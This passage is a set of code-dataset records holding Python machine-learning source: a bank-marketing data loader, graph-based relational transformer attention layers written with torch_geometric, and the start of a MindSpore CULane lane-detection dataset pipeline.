13)\n previous = Attribute((0, 1), 14)\n poutcome = Attribute((0, 1, 2, 3), 15)\n\n attributes = (age, job, marital, education, default, balance, housing, loan,\n contact, day, month, duration, campaign, pdays, previous, poutcome)\n\n labels = (1, -1)\n labels_map = {\"yes\": 1, \"no\": -1}\n\n age_map = {\"yes\": 0, \"no\": 1}\n job_map = {\"admin.\": 0, \"unknown\": 1, \"unemployed\": 2, \"management\": 3, \"housemaid\": 4, \"entrepreneur\": 5,\n \"student\": 6, \"blue-collar\": 7, \"self-employed\": 8, \"retired\": 9, \"technician\": 10, \"services\": 11}\n marital_map = {\"married\": 0, \"divorced\": 1, \"single\": 2}\n education_map = {\"unknown\": 0, \"secondary\": 1, \"primary\": 2, \"tertiary\": 3}\n default_map = {\"yes\": 0, \"no\": 1}\n balance_map = {\"yes\": 0, \"no\": 1}\n housing_map = {\"yes\": 0, \"no\": 1}\n loan_map = {\"yes\": 0, \"no\": 1}\n contact_map = {\"unknown\": 0, \"telephone\": 1, \"cellular\": 2}\n day_map = {\"yes\": 0, \"no\": 1}\n month_map = {\"jan\": 0, \"feb\": 1, \"mar\": 2, \"apr\": 3, \"may\": 4, \"jun\": 5,\n \"jul\": 6, \"aug\": 7, \"sep\": 8, \"oct\": 9, \"nov\": 10, \"dec\": 11}\n duration_map = {\"yes\": 0, \"no\": 1}\n campaign_map = {\"yes\": 0, \"no\": 1}\n pdays_map = {\"yes\": 0, \"no\": 1}\n previous_map = {\"yes\": 0, \"no\": 1}\n poutcome_map = {\"unknown\": 0, \"other\": 1, \"failure\": 2, \"success\": 3}\n\n data_map = [age_map, job_map, marital_map, education_map, default_map, balance_map, housing_map, loan_map,\n contact_map, day_map, month_map, duration_map, campaign_map, pdays_map, previous_map, poutcome_map]\n\n def __init__(self):\n \"\"\"Data constructor\n\n \"\"\"\n self.examples = []\n\n def initialize_data_from_file(self, filepath, unknown_is_not_attribute):\n \"\"\"Initialize data from csv file\n\n :param filepath: absolute path to csv file\n :type filepath: string\n :param unknown_is_not_attribute: are 'unknown' values considered attributes?\n :type unknown_is_not_attribute: bool\n :return: None\n \"\"\"\n # Initialize necessary data structures to modify data\n ages = [] # index 0\n balances = [] # index 5\n days = [] # index 9\n durations = [] # index 11\n campaigns = [] # index 12\n pdays = [] # index 13\n previous = [] # index 14\n lists = [ages, balances, days, durations, campaigns, pdays, previous]\n\n job_distro = {\"admin.\": 0, \"unknown\": 0, \"unemployed\": 0, \"management\": 0, \"housemaid\": 0, \"entrepreneur\": 0,\n \"student\": 0, \"blue-collar\": 0, \"self-employed\": 0, \"retired\": 0, \"technician\": 0, \"services\": 0}\n education_distro = {\"unknown\": 0, \"secondary\": 0, \"primary\": 0, \"tertiary\": 0}\n contact_distro = {\"unknown\": 0, \"telephone\": 0, \"cellular\": 0}\n poutcome_distro = {\"unknown\": 0, \"other\": 0, \"failure\": 0, \"success\": 0}\n\n with open(filepath, 'r') as f:\n for line in f:\n terms = line.strip().split(',')\n self.examples.append(Feature(terms, 1.0, 0.0))\n\n ages.append(float(terms[0]))\n balances.append(float(terms[5]))\n days.append(float(terms[9]))\n durations.append(float(terms[11]))\n campaigns.append(float(terms[12]))\n pdays.append(float(terms[13]))\n previous.append(float(terms[14]))\n\n if unknown_is_not_attribute:\n job_distro[terms[1]] += 1\n education_distro[terms[3]] += 1\n contact_distro[terms[8]] += 1\n poutcome_distro[terms[15]] += 1\n\n common_elements = [get_common_element(job_distro), get_common_element(education_distro),\n get_common_element(contact_distro), get_common_element(poutcome_distro)]\n\n thresholds = []\n for i in range(0, 7):\n thresholds.append(get_median(sorted(lists[i])))\n\n for example in self.examples:\n example.set_attribute_value(thresholds[0], 0)\n example.set_attribute_value(thresholds[1], 5)\n example.set_attribute_value(thresholds[2], 9)\n example.set_attribute_value(thresholds[3], 11)\n example.set_attribute_value(thresholds[4], 12)\n example.set_attribute_value(thresholds[5], 13)\n example.set_attribute_value(thresholds[6], 14)\n example.set_weight(1.0)\n example.set_base_size(len(self.examples))\n\n if unknown_is_not_attribute:\n if example.get_attribute_at(1) == \"unknown\":\n example.set_unknown_attribute(common_elements[0], 1)\n if example.get_attribute_at(3) == \"unknown\":\n example.set_unknown_attribute(common_elements[1], 3)\n if example.get_attribute_at(8) == \"unknown\":\n example.set_unknown_attribute(common_elements[2], 8)\n if example.get_attribute_at(15) == \"unknown\":\n example.set_unknown_attribute(common_elements[3], 15)\n\n for example in self.examples:\n example.convert_to_numeric()\n\n def get_features(self):\n \"\"\"\n get set of features if necessary\n :return: features\n :rtype: numpy array\n \"\"\"\n features = []\n for example in self.examples:\n features.append(example.get_attributes())\n\n return np.array(features)\n\n def get_labels(self):\n \"\"\"\n get set of labels if necessary\n :return: labels\n :rtype: numpy array\n \"\"\"\n labels = []\n for example in self.examples:\n labels.append(example.get_label)\n\n return np.array(labels)\n\n\n# Get double Median of list\ndef get_median(values):\n length = len(values)\n if length % 2 == 0:\n return float(values[int(length / 2)] + values[int(length / 2) - 1]) / 2.0\n else:\n return float(values[length / 2])\n\n\n# Get key with most amount values in dictionary\ndef get_common_element(values):\n common_key = None\n count = 0\n for key in values:\n if values[key] > count:\n count = values[key]\n common_key = key\n\n return common_key\n","repo_name":"morsgiathatch/machine_learning","sub_path":"Data/bank/BankData.py","file_name":"BankData.py","file_ext":"py","file_size_in_byte":8472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38688194971","text":"from itertools import product\nfrom typing import Union, Tuple, Optional\nfrom torch_geometric.typing import (OptPairTensor, Adj, Size, NoneType,\n OptTensor)\n\nimport torch\nfrom torch import Tensor\nimport torch.nn.functional as F\nfrom torch.nn import Parameter, Linear\nfrom torch_sparse import SparseTensor, set_diag\nfrom torch_geometric.nn.conv import MessagePassing\nfrom torch_geometric.utils import remove_self_loops, add_self_loops, softmax\n\nfrom torch_geometric.nn.inits import glorot, zeros\n\nfrom parseq.transformer import TransformerConfig, TransformerLayerFF\n\n\nFACTOR = 1.\n\n\nclass TransformerAttentionConv(MessagePassing):\n def __init__(self, config: TransformerConfig):\n super().__init__(node_dim=0)\n self.config = config\n # self.is_decoder = config.is_decoder\n\n self.d_model = config.d_model\n self.d_kv = config.d_kv\n self.n_heads = config.num_heads\n self.dropout = config.dropout_rate\n self.inner_dim = self.n_heads * self.d_kv\n\n # Mesh TensorFlow initialization to avoid scaling before softmax\n self.q = torch.nn.Linear(self.d_model, self.inner_dim, bias=False)\n self.k = torch.nn.Linear(self.d_model, self.inner_dim, bias=False)\n self.v = torch.nn.Linear(self.d_model, self.inner_dim, bias=False)\n self.o = torch.nn.Linear(self.inner_dim, self.d_model, bias=False)\n\n self.layer_norm = torch.nn.LayerNorm(config.d_model, eps=config.layer_norm_epsilon)\n self.dropout = torch.nn.Dropout(config.dropout_rate)\n self.attn_dropout = torch.nn.Dropout(config.attention_dropout_rate)\n\n self.reset_parameters()\n\n def reset_parameters(self):\n d_model = self.config.d_model\n d_kv = self.config.d_kv\n n_heads = self.config.num_heads\n self.q.weight.data.normal_(mean=0.0, std=FACTOR * ((d_model * d_kv) ** -0.5))\n self.k.weight.data.normal_(mean=0.0, std=FACTOR * (d_model ** -0.5))\n self.v.weight.data.normal_(mean=0.0, std=FACTOR * (d_model ** -0.5))\n self.o.weight.data.normal_(mean=0.0, std=FACTOR * ((n_heads * d_kv) ** -0.5))\n\n def forward(self, edge_index: Adj, x:torch.Tensor=None, kv:torch.Tensor=None):\n H, C = self.n_heads, self.d_kv\n\n assert x.dim() == 2, 'Static graphs not supported in `GATConv`.'\n assert kv.dim() == 2\n\n q = self.layer_norm(x)\n\n q = self.q(q).view(q.size(0), H, C)\n k = self.k(kv).view(kv.size(0), H, C)\n v = self.v(kv).view(kv.size(0), H, C)\n\n # propagate_type: (x: OptPairTensor, alpha: OptPairTensor)\n out = self.propagate(edge_index, q=(None, q), k=(k, None), v=(v, None))\n\n out = out.view(-1, self.n_heads * self.d_kv)\n\n out = self.o(out)\n\n out = x + self.dropout(out)\n return out\n\n def message(self,\n q_i: Tensor, # key\n k_j: Tensor, # query\n v_j: Tensor, # value\n edge_index_i: Tensor,\n edge_index_j: Tensor) -> Tensor:\n attention_scores = (q_i * k_j).sum(-1)\n alpha = softmax(attention_scores, edge_index_i)\n alpha = self.attn_dropout(alpha)\n ret = v_j * alpha.unsqueeze(-1) # weigh the incoming states by alphas\n return ret\n\n\nclass RelationalTransformerAttentionConv(MessagePassing):\n GATE_BIAS = 3.\n def __init__(self, config: TransformerConfig):\n super().__init__(node_dim=0)\n self.config = config\n # self.is_decoder = config.is_decoder\n\n self.d_model = config.d_model\n self.d_kv = config.d_kv\n self.n_heads = config.num_heads\n self.dropout = config.dropout_rate\n self.d_ff = config.d_ff\n self.inner_dim = self.n_heads * self.d_kv\n\n self.q = torch.nn.Linear(self.d_model, self.inner_dim, bias=False)\n\n self.relA = torch.nn.Linear(self.d_model * 2, self.d_ff)\n self.relB = torch.nn.Linear(self.d_ff, self.d_model)\n self.relG = torch.nn.Linear(self.d_ff, self.d_model)\n\n self.k = torch.nn.Linear(self.d_model * 2, self.inner_dim, bias=False)\n self.v = torch.nn.Linear(self.d_model, self.inner_dim, bias=False)\n\n self.o = torch.nn.Linear(self.inner_dim, self.d_model, bias=False)\n\n self.layer_norm = torch.nn.LayerNorm(config.d_model, eps=config.layer_norm_epsilon)\n self.dropout = torch.nn.Dropout(config.dropout_rate)\n self.attn_dropout = torch.nn.Dropout(config.attention_dropout_rate)\n\n self.reset_parameters()\n\n def reset_parameters(self):\n d_model = self.config.d_model\n d_kv = self.config.d_kv\n n_heads = self.config.num_heads\n self.q.weight.data.normal_(mean=0.0, std=FACTOR * ((d_model * d_kv) ** -0.5))\n self.k.weight.data.normal_(mean=0.0, std=FACTOR * (d_model ** -0.5))\n self.v.weight.data.normal_(mean=0.0, std=FACTOR * (d_model ** -0.5))\n self.o.weight.data.normal_(mean=0.0, std=FACTOR * ((n_heads * d_kv) ** -0.5))\n\n def forward(self, edge_index: Adj, x:torch.Tensor=None, kv:torch.Tensor=None,\n edge_features:torch.Tensor=None):\n H, C = self.n_heads, self.d_kv\n\n assert x.dim() == 2, 'Static graphs not supported in `GATConv`.'\n assert kv.dim() == 2\n\n q = self.layer_norm(x)\n\n q = self.q(q).view(q.size(0), H, C)\n\n # propagate_type: (x: OptPairTensor, alpha: OptPairTensor)\n out = self.propagate(edge_index, q=(None, q), kv=(kv, None), edge_features=edge_features)\n\n out = out.view(-1, self.n_heads * self.d_kv)\n\n out = self.o(out)\n\n out = x + self.dropout(out)\n return out\n\n def message(self,\n q_i: Tensor, # key\n kv_j: Tensor, # values\n edge_index_i: Tensor,\n edge_index_j: Tensor,\n edge_features: torch.Tensor=None) -> Tensor:\n assert edge_features is not None, \"'edge_features' can not be None\"\n\n H, C = self.n_heads, self.d_kv\n\n inter_k = torch.celu(self.relA(torch.cat([kv_j, edge_features], -1)))\n k_gate = torch.sigmoid(self.relG(inter_k) + self.GATE_BIAS)\n k_add = self.relB(inter_k)\n _kv_j = kv_j * k_gate + k_add * (1 - k_gate)\n k_j = self.k(torch.cat([_kv_j, edge_features], -1)).view(_kv_j.size(0), H, C)\n v_j = self.v(_kv_j).view(_kv_j.size(0), H, C)\n\n attention_scores = (q_i * k_j).sum(-1)\n alpha = softmax(attention_scores, edge_index_i)\n alpha = self.attn_dropout(alpha)\n\n ret = v_j * alpha.unsqueeze(-1) # weigh the incoming states by alphas\n return ret\n\n\nclass TransformerConv(MessagePassing):\n def __init__(self,\n config:TransformerConfig,\n **kw):\n super().__init__()\n self.is_decoder = config.is_decoder\n self.layer = torch.nn.ModuleList()\n self.layer.append(TransformerAttentionConv(config))\n if self.is_decoder:\n self.layer.append(TransformerAttentionConv(config))\n\n self.layer.append(TransformerLayerFF(config))\n\n def forward(self,\n states: torch.Tensor,\n edge_index: Adj,\n ctx_states=None,\n ctx_edge_index: Adj=None,\n **kwargs):\n\n self_attn_out = self.layer[0](edge_index, x=states, kv=states)\n states = self_attn_out\n if self.is_decoder:\n assert(ctx_states is not None and ctx_edge_index is not None)\n ctx_attn_out = self.layer[1](ctx_edge_index, x=states, kv=ctx_states)\n states = ctx_attn_out\n\n states = self.layer[-1](states)\n return states\n\n\nclass RelationalTransformerConv(MessagePassing):\n def __init__(self,\n config:TransformerConfig,\n **kw):\n super().__init__()\n self.is_decoder = config.is_decoder\n self.layer = torch.nn.ModuleList()\n self.layer.append(RelationalTransformerAttentionConv(config))\n if self.is_decoder:\n self.layer.append(TransformerAttentionConv(config))\n\n self.layer.append(TransformerLayerFF(config))\n\n def forward(self,\n states: torch.Tensor,\n edge_index: Adj,\n edge_features: torch.Tensor=None,\n ctx_states=None,\n ctx_edge_index: Adj=None,\n **kwargs):\n\n self_attn_out = self.layer[0](edge_index, x=states, kv=states, edge_features=edge_features)\n states = self_attn_out\n if self.is_decoder:\n assert(ctx_states is not None and ctx_edge_index is not None)\n ctx_attn_out = self.layer[1](ctx_edge_index, x=states, kv=ctx_states)\n states = ctx_attn_out\n\n states = self.layer[-1](states)\n return states\n\n\nclass RelationalTransformer(torch.nn.Module):\n def __init__(self, config:TransformerConfig, **kw):\n super(RelationalTransformer, self).__init__(**kw)\n self.config = config\n self.hdim = self.config.d_model\n self.vocabsize = self.config.vocab_size\n self.relvocabsize = self.config.relvocab_size\n\n self.node_emb = torch.nn.Embedding(self.vocabsize, self.hdim)\n self.edge_emb = torch.nn.Embedding(self.relvocabsize, self.hdim)\n\n self.layers = torch.nn.ModuleList()\n for i in range(self.config.num_layers):\n layer = RelationalTransformerConv(config=config)\n self.layers.append(layer)\n\n def forward(self,\n node_ids: torch.Tensor,\n edge_index: Adj,\n edge_ids: torch.Tensor,\n ctx: torch.Tensor=None,\n ctx_edge_index: Adj=None,\n **kwargs):\n node_states = self.node_emb(node_ids)\n edge_feats = self.edge_emb(edge_ids)\n\n for layer in self.layers:\n node_states = layer(node_states, edge_index, edge_feats,\n ctx_states=ctx, ctx_edge_index=ctx_edge_index)\n return node_states\n\n\nclass RelativePositionTransformer(RelationalTransformer):\n PADID = 0\n MAXLEN = 256\n\n def __init__(self, config:TransformerConfig, **kw):\n config.relvocab_size = self.MAXLEN\n super(RelativePositionTransformer, self).__init__(config, **kw)\n\n def forward(self,\n x: torch.Tensor, # (batsize, seqlen) ids\n ctx: torch.Tensor=None, # (batsize, ctxlen, dim)\n ctx_mask: torch.Tensor=None, # (batsize, ctxlen) bool\n **kwargs):\n edges = []\n edge_ids = []\n ctx_edges = [] if ctx is not None else None\n B, L = x.size()\n ctxL = ctx.size(1) if ctx is not None else None\n for i, x_i in enumerate(x.detach().cpu().numpy()):\n for j in range(len(x_i)):\n x_ij = x_i[j]\n if x_ij != self.PADID:\n edges.append([j + i*L, j + i*L])\n edge_ids.append(0)\n for k in range(j+1, len(x_i)):\n x_ik = x_i[k]\n if x_ik != self.PADID:\n edges.append([j + i*L, k + i*L])\n edges.append([k + i*L, j + i*L])\n assert(abs(j - k) < self.MAXLEN/2)\n edge_ids.append((k - j + self.MAXLEN) % self.MAXLEN)\n edge_ids.append((j - k + self.MAXLEN) % self.MAXLEN)\n if ctx is not None:\n for k in range(0, ctxL):\n if ctx_mask[i, k].detach().cpu().item() != 0:\n ctx_edges.append([k + i*ctxL, j + i*L])\n\n edges = torch.tensor(edges).to(x.device).T\n edge_ids = torch.tensor(edge_ids).to(x.device)\n ctx_edges = torch.tensor(ctx_edges).to(x.device).T if ctx_edges is not None else None\n\n # flatten everything\n x = x.view(-1)\n if ctx is not None:\n ctx = ctx.view(-1, ctx.size(-1))\n\n out = super(RelativePositionTransformer, self).forward(x, edges, edge_ids, ctx=ctx, ctx_edge_index=ctx_edges)\n out = out.view(B, L, out.size(-1))\n\n return out\n\n\nclass MGATConv(MessagePassing):\n def __init__(self,\n indim: int,\n outdim: int=None,\n numheads: int = 1,\n negative_slope: float = 0.2,\n dropout: float = 0.,\n add_self_loops: bool = True,\n bias: bool = True,\n **kwargs):\n super(MGATConv, self).__init__(aggr='add', node_dim=0, **kwargs)\n\n self.indim = indim\n self.outdim = outdim if outdim is not None else outdim\n self.numheads = numheads\n self.negative_slope = negative_slope\n self.dropout = dropout\n self.add_self_loops = add_self_loops\n\n assert outdim % numheads == 0, f\" 'outdim' must be divisible by 'numheads' but {outdim} resp. {numheads} given\"\n self.size_per_head = outdim // numheads\n\n self.lin = Linear(indim, outdim, bias=False)\n\n if bias:\n self.bias = Parameter(torch.Tensor(outdim))\n else:\n self.register_parameter('bias', None)\n\n self._alpha = None\n\n self.reset_parameters()\n\n def reset_parameters(self):\n glorot(self.lin.weight)\n zeros(self.bias)\n\n def forward(self, x: Union[Tensor, OptPairTensor], edge_index: Adj,\n size: Size = None, return_attention_weights=False):\n # type: (Union[Tensor, OptPairTensor], Tensor, Size, NoneType) -> Tensor # noqa\n # type: (Union[Tensor, OptPairTensor], SparseTensor, Size, NoneType) -> Tensor # noqa\n # type: (Union[Tensor, OptPairTensor], Tensor, Size, bool) -> Tuple[Tensor, Tuple[Tensor, Tensor]] # noqa\n # type: (Union[Tensor, OptPairTensor], SparseTensor, Size, bool) -> Tuple[Tensor, SparseTensor] # noqa\n r\"\"\"\n\n Args:\n return_attention_weights (bool, optional): If set to :obj:`True`,\n will additionally return the tuple\n :obj:`(edge_index, attention_weights)`, holding the computed\n attention weights for each edge. (default: :obj:`None`)\n \"\"\"\n assert return_attention_weights == False, \"Returning attention weights not supported. \"\n H, C = self.numheads, self.size_per_head\n\n assert x.dim() == 2, 'Static graphs not supported in `GATConv`.'\n x_l = x_r = self.lin(x).view(x.size(0), H, C)\n\n if self.add_self_loops:\n if isinstance(edge_index, Tensor):\n num_nodes = x_l.size(0)\n num_nodes = size[1] if size is not None else num_nodes\n num_nodes = x_r.size(0) if x_r is not None else num_nodes\n edge_index, _ = remove_self_loops(edge_index)\n edge_index, _ = add_self_loops(edge_index, num_nodes=num_nodes)\n elif isinstance(edge_index, SparseTensor):\n edge_index = set_diag(edge_index)\n\n # propagate_type: (x: OptPairTensor, alpha: OptPairTensor)\n out = self.propagate(edge_index, x=(x_l, x_r), size=size)\n\n out = out.view(-1, self.heads * self.size_per_head)\n\n if self.bias is not None:\n out += self.bias\n\n return out\n\n def message(self,\n x_j: Tensor,\n x_i: Tensor,\n edge_index_i: Tensor,\n edge_index_j: Tensor,\n size_i: Optional[int]) -> Tensor:\n attention_scores = (x_j * x_i).sum(-1)\n alpha = softmax(attention_scores, edge_index_i, num_nodes=size_i)\n alpha = F.dropout(alpha, p=self.dropout, training=self.training)\n ret = x_j * alpha.unsqueeze(-1) # weigh the incoming states by alphas\n return ret\n\n def __repr__(self):\n return '{}({}, {}, heads={})'.format(self.__class__.__name__,\n self.in_channels,\n self.out_channels, self.heads)\n\n\ndef try_mgat_conv():\n m = MGATConv(5, 6, numheads=2)\n\n x = torch.randn(4, 5)\n edge_index = torch.tensor([[0, 1, 2, 3], [0, 0, 1, 1]])\n out = m(x, edge_index)\n\n print(out)\n\n\ndef try_transformer_attn_conv():\n conf = TransformerConfig(d_model=6, num_heads=2, d_kv=3, d_ff=24, num_layers=2)\n m = TransformerAttentionConv(conf)\n\n q = torch.randn(4, 6)\n kv = torch.randn(7, 6)\n\n edge_index = torch.tensor([[0, 2, 4, 6],[0, 1, 2, 3]])\n # edge_features = torch.randn(4, 6)\n\n out = m(edge_index, x=q, kv=kv)\n\n print(out)\n\n\ndef try_relational_transformer_attn_conv():\n conf = TransformerConfig(d_model=6, num_heads=2, d_kv=3, d_ff=24, num_layers=2)\n m = RelationalTransformerAttentionConv(conf)\n\n q = torch.randn(4, 6)\n kv = torch.randn(7, 6)\n\n edge_index = torch.tensor([[0, 2, 4, 6],[0, 1, 2, 3]])\n edge_features = torch.randn(4, 6)\n\n out = m(edge_index, x=q, kv=kv, edge_features=edge_features)\n\n print(out)\n\n\ndef try_relational_transformer():\n conf = TransformerConfig(d_model=6, num_heads=2, d_kv=3, d_ff=24, num_layers=2)\n conf.vocab_size = 11\n conf.relvocab_size = 3\n\n node_ids = torch.randint(1, conf.vocab_size, (5,))\n edge_index = torch.tensor([[0, 1, 2, 3, 4, 0, 1, 2, 3, 4], [1, 2, 3, 4, 0, 4, 0, 1, 2, 3]])\n edge_ids = torch.randint(1, conf.relvocab_size, (10,))\n\n m = RelationalTransformer(conf)\n\n out = m(node_ids, edge_index, edge_ids)\n\n print(out)\n\n\ndef try_relative_position_transformer():\n conf = TransformerConfig(d_model=6, num_heads=2, d_kv=3, d_ff=24, num_layers=2)\n conf.vocab_size = 11\n\n m = RelativePositionTransformer(conf)\n\n x = torch.tensor([\n [1, 2, 3, 0, 0, 0],\n [4, 5, 3, 6, 7, 9],\n [10, 0, 0, 0, 0, 0]\n ])\n\n out = m(x)\n print(out)\n\n print(out.size())\n\n out[1, -1].sum().backward()\n print(m.node_emb.weight.grad)\n\n\ndef try_relative_position_transformer_with_context():\n conf = TransformerConfig(d_model=6, num_heads=2, d_kv=3, d_ff=24, num_layers=2)\n conf.vocab_size = 11\n conf.is_decoder = True\n\n m = RelativePositionTransformer(conf)\n\n x = torch.tensor([\n [1, 2, 3, 0, 0, 0],\n [4, 5, 3, 6, 7, 9],\n [10, 0, 0, 0, 0, 0]\n ])\n\n ctx = torch.nn.Parameter(torch.randn(3, 4, 6))\n ctx_mask = torch.tensor([\n [1, 1, 0, 0],\n [0, 0, 0, 0],\n [1, 1, 1, 1]\n ])\n\n out = m(x, ctx=ctx, ctx_mask=ctx_mask)\n print(out)\n\n print(out.size())\n\n out[0, 0].sum().backward()\n print(m.node_emb.weight.grad)\n print(ctx.grad)\n\n\nif __name__ == '__main__':\n # try_mgat_conv()\n # try_transformer_attn_conv()\n # try_relational_transformer_attn_conv()\n # try_relational_transformer()\n # try_relative_position_transformer()\n try_relative_position_transformer_with_context()","repo_name":"lukovnikov/parseq","sub_path":"parseq/reltm.py","file_name":"reltm.py","file_ext":"py","file_size_in_byte":18830,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"25563162983","text":"# Copyright 2021-2022 Huawei Technologies Co., Ltd\r\n#\r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n#\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n# ============================================================================\r\n\"\"\"create train or eval dataset.\"\"\"\r\n\r\nimport os\r\nimport cv2\r\nimport warnings\r\nimport numpy as np\r\nimport mindspore.dataset as de\r\nimport mindspore.dataset.vision.c_transforms as C\r\nfrom .model_utils.config import config\r\nimport imgaug as ia\r\nimport imgaug.augmenters as iaa\r\nfrom imgaug.augmentables.lines import LineString as ia_LineString\r\nfrom imgaug.augmentables.lines import LineStringsOnImage\r\nfrom .lane_augmentation import get_fastdraw_aug, get_infer_aug\r\nfrom .lane_geometry import FloatLengthLine, PointSelf, load_CULaneFile, load_lines, to_LineStringsStruct\r\nfrom mindspore.mindrecord import FileWriter\r\nfrom .lane_codec import encode\r\n\r\n\r\nif config.device_target == \"Ascend\":\r\n np_cast_type = np.float16\r\nelse:\r\n np_cast_type = np.float32\r\n\r\ndef resize_by_wh(*, img, width, height):\r\n dim = (width, height)\r\n resized = cv2.resize(img, dim, interpolation=cv2.INTER_LINEAR)\r\n return resized\r\n\r\ndef create_culane_label(is_training):\r\n culane_root = config.culane_root\r\n data_type = config.val_data_type\r\n if is_training:\r\n data_type = config.train_data_type\r\n\r\n images_list_path = os.path.join(culane_root, 'list', '{}.txt'.format(data_type))\r\n images_list = load_lines(images_list_path)\r\n images_annos_path = []\r\n images_num = len(images_list)\r\n for ind, img_list in enumerate(images_list):\r\n path_pair = dict(\r\n image_path=os.path.join(culane_root, img_list[1:]),\r\n anno_path=os.path.join(culane_root, img_list[1:].replace('.jpg', '.lines.txt')))\r\n images_annos_path.append(path_pair)\r\n\r\n if (ind + 1) % 10 == 0:\r\n print(\"{}/{}: parsing annotation for image={}\".format(ind + 1, images_num, images_list))\r\n return images_annos_path\r\n\r\ndef data_to_mindrecord_byte_image(dataset=\"culane\", is_training=True, prefix=\"culane.mindrecord\", file_num=1):\r\n \"\"\"Create MindRecord file.\"\"\"\r\n mindrecord_dir = config.mindrecord_dir\r\n mindrecord_path = os.path.join(mindrecord_dir, prefix)\r\n\r\n writer = FileWriter(mindrecord_path, file_num, overwrite=True)\r\n if dataset == \"culane\":\r\n images_annos = create_culane_label(is_training)\r\n else:\r\n print(\"Error unsupported other dataset\")\r\n return\r\n\r\n relaychain_json = {\r\n \"image\": {\"type\": \"bytes\"},\r\n \"all_points\": {\"type\": \"int32\", 'shape': [-1]},\r\n \"points_onelane\": {\"type\": \"int32\", 'shape': [-1]}\r\n }\r\n\r\n writer.add_schema(relaychain_json, \"culane_json\")\r\n\r\n image_files_num = len(images_annos)\r\n for ind, image_anno in enumerate(images_annos):\r\n image_path, anno_path = image_anno['image_path'], image_anno['anno_path']\r\n with open(image_path, 'rb') as f:\r\n img = f.read()\r\n\r\n image_shape = (config.image_height, config.image_width)\r\n anno_lanes, all_points, per_num = load_CULaneFile(anno_path, image_shape)\r\n all_points = np.array(all_points, dtype=np.int32)\r\n per_num = np.array(per_num, dtype=np.int32)\r\n row = {\"image\": img, \"all_points\": all_points, 'points_onelane': per_num}\r\n if (ind + 1) % 10 == 0:\r\n print(\"writing {}/{} into mindrecord\".format(ind + 1, image_files_num))\r\n writer.write_raw_data([row])\r\n\r\n writer.commit()\r\n\r\n\r\ndef preprocess_fn(image, all_points, points_onelane, is_training):\r\n \"\"\"Data augmentation function.\"\"\"\r\n\r\n resize_height = config.resize_height\r\n resize_width = config.resize_width\r\n\r\n image_bgr = image.copy()\r\n image_bgr[:, :, 0] = image[:, :, 2]\r\n image_bgr[:, :, 1] = image[:, :, 1]\r\n image_bgr[:, :, 2] = image[:, :, 0]\r\n image_shape = image_bgr.shape[:2]\r\n\r\n lanes_tuple = []\r\n start = 0\r\n for num in points_onelane:\r\n num_point = int(num*2)\r\n lane = []\r\n lane_points = all_points[start:num_point+start]\r\n for i in range(0, len(lane_points), 2):\r\n lane.append((float(lane_points[i]), float(lane_points[i+1])))\r\n start += num_point\r\n lanes_tuple.append(lane)\r\n\r\n lss = [ia_LineString(lane_tuple) for lane_tuple in lanes_tuple]\r\n\r\n if is_training:\r\n aug = get_fastdraw_aug()\r\n lsoi = LineStringsOnImage(lss, shape=image_shape)\r\n batch = ia.Batch(images=[image_bgr], line_strings=[lsoi])\r\n batch_aug = list(aug.augment_batches([batch]))[0] # augment_batches returns a generator\r\n image_aug = batch_aug.images_aug[0]\r\n lsoi_aug = batch_aug.line_strings_aug[0]\r\n\r\n new_image = cv2.resize(image_aug, (800, 320))\r\n new_image = new_image.astype(np_cast_type)\r\n new_lanes = []\r\n for shapely_line in lsoi_aug:\r\n line_spec = FloatLengthLine(width=image_shape[1], height=image_shape[0])\r\n for kpt in shapely_line.to_keypoints():\r\n line_spec.append(PointSelf(x=kpt.x, y=kpt.y, score=1.0))\r\n line_spec.expand_(resize_width, resize_height)\r\n new_lanes.append(line_spec)\r\n new_lanes = to_LineStringsStruct(new_lanes)\r\n\r\n segment, up_arrow, down_arrow, up_bound, down_bound = encode(new_lanes)\r\n print(segment.shape, up_arrow.shape)\r\n\r\n return new_image, segment, up_arrow, down_arrow, up_bound, down_bound\r\n\r\n else:\r\n aug = get_infer_aug()\r\n lss = []\r\n lsoi = LineStringsOnImage(lss, shape=image_shape)\r\n batch = ia.Batch(images=[image], line_strings=[lsoi])\r\n batch_aug = list(aug.augment_batches([batch]))[0]\r\n image_aug = batch_aug.images_aug[0]\r\n\r\n new_image = resize_by_wh(img=image_aug, width=resize_width, height=resize_height)\r\n new_image = new_image.astype(np_cast_type)\r\n # new_lanes = ['infer_no_aug']\r\n\r\n return new_image\r\n\r\n\r\ndef create_culane_dataset(mindrecord_file,\r\n batch_size=2,\r\n device_num=1,\r\n rank_id=0,\r\n is_training=True,\r\n num_parallel_workers=8):\r\n cv2.setNumThreads(0)\r\n de.config.set_prefetch_size(8)\r\n ds = de.MindDataset(mindrecord_file, columns_list=[\"image\", \"all_points\", 'points_onelane'],\r\n num_shards=device_num, shard_id=rank_id,\r\n num_parallel_workers=1, shuffle=is_training)\r\n\r\n decode = C.Decode()\r\n ds = ds.map(operations=decode, input_columns=[\"image\"])\r\n compose_map_func = (lambda image, all_points, points_onelane:\r\n preprocess_fn(image, all_points, points_onelane, is_training))\r\n\r\n if is_training:\r\n ds = ds.map(operations=compose_map_func,\r\n input_columns=[\"image\", \"all_points\", 'points_onelane'],\r\n output_columns=[\"image\", \"segment\", \"up_arrow\", \"down_arrow\", \"up_bound\", \"down_bound\"],\r\n column_order=[\"image\", \"segment\", \"up_arrow\", \"down_arrow\", \"up_bound\", \"down_bound\"],\r\n python_multiprocessing=False,\r\n num_parallel_workers=num_parallel_workers)\r\n ds = ds.batch(batch_size, drop_remainder=True, pad_info=None)\r\n\r\n\r\n else:\r\n ds = ds.map(operations=compose_map_func,\r\n input_columns=[\"image\", \"all_points\", 'points_onelane'],\r\n output_columns=[\"image\"],\r\n column_order=[\"image\",],\r\n num_parallel_workers=num_parallel_workers)\r\n ds = ds.batch(batch_size, drop_remainder=True)\r\n\r\n return 